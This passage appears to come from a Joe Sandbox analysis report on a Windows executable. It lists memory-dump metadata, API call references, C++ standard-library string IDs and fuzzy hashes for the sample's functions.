                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                • API String ID: 0-1533248280
                • Opcode ID: 83bee772141ab6abeec47775f504e6167fa554481131b4637841509cfc4c7822
                • Instruction ID: 6c6f067cc7e08f8df46bb0d10e405e61ac3440c2b505e78e39265a7318aacf33
                • Opcode Fuzzy Hash: 83bee772141ab6abeec47775f504e6167fa554481131b4637841509cfc4c7822
                • Instruction Fuzzy Hash: C241E6A2F0574782FF21BFA1EC542B9A355DBA5B88F844472DE0C0B355FE2CD5918B60
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                • API String ID: 0-1533248280
                • Opcode ID: cb3730ac8129c8c4ef42340d8b107faaabf8f20e86b8dd0908d3d004f4cceec3
                • Instruction ID: 8fc2c230705095f856721c3c625fc0e12e6505f4d477b536318bc41c37ae27c3
                • Opcode Fuzzy Hash: cb3730ac8129c8c4ef42340d8b107faaabf8f20e86b8dd0908d3d004f4cceec3
                • Instruction Fuzzy Hash: 8041F8A2F0574782FF21AFA1EC542B9A355DF65B84F844472DE0C0B355FE2CD6918B60
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlenwcslen
                • String ID: basic_string: construction from null is not valid
                • API String ID: 803329031-2991274800
                • Opcode ID: 75bb8393494913ee138293e47c3b5af586e38598566a93379fd258d769904ff0
                • Instruction ID: 9af0f3fefea9c15c9815a105857b9aa04aa8eaff71fd4e76fb67faed4a23ef65
                • Opcode Fuzzy Hash: 75bb8393494913ee138293e47c3b5af586e38598566a93379fd258d769904ff0
                • Instruction Fuzzy Hash: C5419362B59B1681EE59BF56EC500EC6321EB89F94BCD1432CD0D07764EE3CEA82D720
                APIs
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?,00007FF72A01B100), ref: 00007FF72A01C282
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?,00007FF72A01B100), ref: 00007FF72A01C2BB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: basic_string::assign
                • API String ID: 3510742995-2385367300
                • Opcode ID: 715c8530e2adc078ded41c5c8b197e09ba83f0c17ca8b6076f7fa96b5e018738
                • Instruction ID: fae90483543417707a720d1ff06f5ee22b1754256d2429f28c64499dc0e90da7
                • Opcode Fuzzy Hash: 715c8530e2adc078ded41c5c8b197e09ba83f0c17ca8b6076f7fa96b5e018738
                • Instruction Fuzzy Hash: 7B419022B0965681FB20AB69D9441BDE3A0EB45FD4FD89271DE0D47390FE2CE5429760
                APIs
                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000,?,00007FF729FABAA5), ref: 00007FF729FD2D18
                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF729FABAA5), ref: 00007FF729FD2DC1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcmp
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                • API String ID: 1475443563-1697194757
                • Opcode ID: 1d6ce5a7110eb6cc7bc8158a27395d924a9c15a1e54c17fb187cf1cf3a95c721
                • Instruction ID: 06926676e2d8456fb2cda275d9efdd126e0f3e887b209f006e7d8ea8fc1b2ad2
                • Opcode Fuzzy Hash: 1d6ce5a7110eb6cc7bc8158a27395d924a9c15a1e54c17fb187cf1cf3a95c721
                • Instruction Fuzzy Hash: 8C31D0A2B0598781FF50AF2AED102E59260DF44BD0F8C4231EE1C57791EE2CDA829620
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memset
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                • API String ID: 2221118986-1339558951
                • Opcode ID: 74562d46386fd63819a959bc83f06668e156f199f347d07823fb839092a98177
                • Instruction ID: f828e702d77d1a92cee4c8089e6dc6b0f52d8d0ca54764c21db119ae25b0d960
                • Opcode Fuzzy Hash: 74562d46386fd63819a959bc83f06668e156f199f347d07823fb839092a98177
                • Instruction Fuzzy Hash: D531E762F09B4782FB24AB66AC504BDA311EB55FD0FC84672DF0D17781EE2CE5918B60
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: realloc
                • String ID:
                • API String ID: 471065373-0
                • Opcode ID: e22b0e94a47a8450984afe8f512c6dad40a064425027682d979066751d6fcd15
                • Instruction ID: 6f46eb382123455692acfc90ac966ea4b4445c675f5cabae5f9797681005034f
                • Opcode Fuzzy Hash: e22b0e94a47a8450984afe8f512c6dad40a064425027682d979066751d6fcd15
                • Instruction Fuzzy Hash: 5E51DC76B10B15CAEB40DFADD8843AC37B1FB48B88F544825DE1CA7769DE38D6518720
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2c0842d67d3aca682af4ea24a3bfdcfe7c8510fcd7310f591c4ee2ea2d933f75
                • Instruction ID: 70675977ab6c544096e918b9ceeeb8c7f905698d433c18611d195aef7b0fe0cd
                • Opcode Fuzzy Hash: 2c0842d67d3aca682af4ea24a3bfdcfe7c8510fcd7310f591c4ee2ea2d933f75
                • Instruction Fuzzy Hash: B221AD50E9C20740FBB47B6A6C562BDD2A2EF06B84FC81471DD1D422CBAE1CA6426E31
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memset$localeconvwcrtomb
                • String ID:
                • API String ID: 760488717-0
                • Opcode ID: 37cf315cdfffd00a87d5797bc9dbdd676c9d1ec89dc6de8e3d34f7b9edef8016
                • Instruction ID: 1e910166a648e71b3ae5f654ab5b984d64562fd4334218b9d9da2b8978a964f0
                • Opcode Fuzzy Hash: 37cf315cdfffd00a87d5797bc9dbdd676c9d1ec89dc6de8e3d34f7b9edef8016
                • Instruction Fuzzy Hash: DD416926B15A498AFB50EF65C8402EC77B0EB48B8CF844136EE4C57B99DE38D700DB60
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: wcrtomb$___mb_cur_max_funcmemcpy
                • String ID:
                • API String ID: 4290179537-0
                • Opcode ID: 1455c9973fed2b73475f62c441def735ec188d9342aba904070f6072e9a62b4e
                • Instruction ID: 987882d1122b6877965de021bfcc8256cb0c6c845f792c44b24d5d524a087482
                • Opcode Fuzzy Hash: 1455c9973fed2b73475f62c441def735ec188d9342aba904070f6072e9a62b4e
                • Instruction Fuzzy Hash: BE31E862B0979540ED606F15AC042AAE365EB46BF8F8D4231DDAC077D4DE3CD282EB10
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlen
                • String ID: basic_string: construction from null is not valid
                • API String ID: 39653677-2991274800
                • Opcode ID: 3955ff3e0dbcfad3a83788aa7ea374c0f2f0b6e854dd9ac53371bf832e8fac1e
                • Instruction ID: c00be85e66a818f9cee36348ec25ac1a58765030070ba13ff37771c6697519a5
                • Opcode Fuzzy Hash: 3955ff3e0dbcfad3a83788aa7ea374c0f2f0b6e854dd9ac53371bf832e8fac1e
                • Instruction Fuzzy Hash: 70218762B59B1641EE65BF1AEC400ECA321EF48F84BD84472DD0D0B765EE2CD647D720
                APIs
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,00007FF729FCE1BE), ref: 00007FF72A025291
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,00007FF729FCE1BE), ref: 00007FF72A0252C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: basic_string::assign
                • API String ID: 3510742995-2385367300
                • Opcode ID: c8fc347fe4dc6b50cfa60ce8fb20a7232c0867b0e7dfa4c159f5fef8c1d2d6e1
                • Instruction ID: 1347c2acf0db89baf37b4fe600d4f83b963a18ed16c3507d3df4e887e50779ed
                • Opcode Fuzzy Hash: c8fc347fe4dc6b50cfa60ce8fb20a7232c0867b0e7dfa4c159f5fef8c1d2d6e1
                • Instruction Fuzzy Hash: 7C21A222B0978241FF21AB5A9A542BCD6A1DB4ABD0FD88171CF4C473D1FE6CE5458724
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: _errno_write$_fileno
                • String ID:
                • API String ID: 3341061957-0
                • Opcode ID: 56187e0759bf5027526d8ec828883573ff23af89730765816de1fcc49bc6beb3
                • Instruction ID: 6d06aa5c836afb5e1184725ac1d02662bb1b24b1ed04c89d5882ff6d29ae1220
                • Opcode Fuzzy Hash: 56187e0759bf5027526d8ec828883573ff23af89730765816de1fcc49bc6beb3
                • Instruction Fuzzy Hash: F111CD12F2965355FA613B266E8407AC190AF89BE4FD841B1ED0C4B7C0FD3CE841AB21
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpystrlen
                • String ID: basic_ios::clear$basic_string::_S_construct null not valid
                • API String ID: 3412268980-3371637893
                • Opcode ID: d2775fc198d7616ba1de734a38b6a68c3bb9aa266471f42886164bc78b3fe207
                • Instruction ID: b3ded6a8069352c855a46af006ef05dcb56ad67f5262c5c204ddf14deff489c3
                • Opcode Fuzzy Hash: d2775fc198d7616ba1de734a38b6a68c3bb9aa266471f42886164bc78b3fe207
                • Instruction Fuzzy Hash: E2110322E09A0340FB26EB25AD003B89654DFA5BE4FC84570EE0D073CAFE2DD641CB60
                APIs
                • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FF72A0AFDB6), ref: 00007FF72A02F68B
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72A0AFDB6), ref: 00007FF72A02F696
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,00007FF72A0AFDB6), ref: 00007FF72A02F6BF
                • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FF72A0AFDB6), ref: 00007FF72A02F6CD
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: setlocale$memcpystrlen
                • String ID:
                • API String ID: 4096897932-0
                • Opcode ID: d051b00df97e8cf62e9cc21fb80062fcd567f8e3d3914ad3ab052e50379fb1e5
                • Instruction ID: c67c08f6bcf3db512c6d505b77c40f19ad809cd7bae75d25164750ef81e39e27
                • Opcode Fuzzy Hash: d051b00df97e8cf62e9cc21fb80062fcd567f8e3d3914ad3ab052e50379fb1e5
                • Instruction Fuzzy Hash: E0F0A751B0964340FF68BB671D161BD8252DF45BC0BD88075DC0D0B386ED2CE2424720
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: abort
                • String ID:
                • API String ID: 4206212132-0
                • Opcode ID: 3d7603118a15bb94b592a687338a59a4fe1b005e5225d0ffd3fd536b333e74bf
                • Instruction ID: 2f0fa0db55b5954a9ab2263612386af89fdd1d46d4d9112a0796c9ee2e2191b5
                • Opcode Fuzzy Hash: 3d7603118a15bb94b592a687338a59a4fe1b005e5225d0ffd3fd536b333e74bf
                • Instruction Fuzzy Hash: 8CD0C990EAE503A1F9943B1E4DEA8BEC026EF06790FE85D70E00D842D39E1C73512DA8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: basic_filebuf::xsgetn error reading the file
                • API String ID: 0-3108371566
                • Opcode ID: 0927fc067ebb6a33a96917f8bfe3f6ce7f7df60c436a53950f08f1643c458f46
